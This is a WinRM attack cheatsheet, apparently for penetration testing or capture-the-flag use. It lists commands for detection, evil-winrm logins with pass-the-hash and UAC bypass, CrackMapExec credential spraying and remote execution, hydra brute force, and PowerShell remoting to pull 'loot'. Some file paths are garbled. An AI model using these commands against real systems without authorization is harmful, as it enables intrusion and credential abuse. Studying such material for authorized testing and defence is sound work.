WinRM Enumeration Cheatsheet

Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS)

What is WinRM? Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration.

Detection

nmap -p 5985,5986 <ip>
nmap -p 5985,5986 -sV <ip>
curl -s http://<ip>:5985/wsman
curl -sk https://<ip>:5986/wsman

Evil-WinRM

# Password auth (HTTP)
evil-winrm -i <ip> -u <user> -p <pass>

# SSL (HTTPS, port 5986)
evil-winrm -i <ip> -u <user> -p <pass> -S

# Pass-the-Hash (NTLM)
evil-winrm -i <ip> -u <user> -H <nthash>

# With scripts and executables directory
evil-winrm -i <ip> -u <user> -p <pass> \
  -s /path/to/ps1_scripts/ \
  -e /path/to/executables/

# Within evil-winrm shell
menu                          # Show built-in commands
upload /local/file.exe        # Upload file
download C:ile.txt          # Download file
Invoke-Binary /local/exe      # Run local exe in memory
bypass_uac                    # UAC bypass

CrackMapExec

# Test credentials
crackmapexec winrm <ip> -u <user> -p <pass>
crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass>

# Credential spray
crackmapexec winrm <ip> -u users.txt -p <pass>
crackmapexec winrm <ip> -u <user> -p wordlist.txt

# Pass-the-Hash
crackmapexec winrm <ip> -u <user> -H <nthash>

# Execute commands
crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami'      # CMD
crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami'      # PowerShell
crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process'

PowerShell / Windows Native

# Test WinRM connectivity
Test-WSMan -ComputerName <ip>
Test-WSMan -ComputerName <ip> -UseSSL

# Interactive remote session
Enter-PSSession -ComputerName <ip> -Credential <user>
Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user>

# Non-interactive / scripted
$cred = Get-Credential
$sess = New-PSSession -ComputerName <ip> -Credential $cred
Invoke-Command -Session $sess -ScriptBlock { whoami; hostname }
Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig }

# Copy files over WinRM
Copy-Item -Path C:\localile.exe -Destination C:
emote\ -ToSession $sess
Copy-Item -Path C:
emote\loot.txt -Destination C:\local\ -FromSession $sess

impacket

# winrm_exec (alternative)
python3 winrm_exec.py <domain>/<user>:<pass>@<ip>

Brute Force

crackmapexec winrm <ip> -u <user> -p wordlist.txt
hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \
  "/wsman:Username=^USER^&Password=^PASS^:401"

Common Scenarios

Pwned user is in group:
  "Remote Management Users"  → Can use WinRM
  "Administrators"            → Full access via WinRM

Check group membership:
net localgroup "Remote Management Users"

Key Facts

Requires user to be in Remote Management Users or Administrators group
Can be enabled with: Enable-PSRemoting -Force
Firewall rule: WinRM-HTTP-In-TCP (port 5985)
Often enabled on Domain Controllers and management servers

WinRM Enumeration Cheatsheet#

Detection#

Evil-WinRM#

CrackMapExec#

PowerShell / Windows Native#

impacket#

Brute Force#

Common Scenarios#

Key Facts#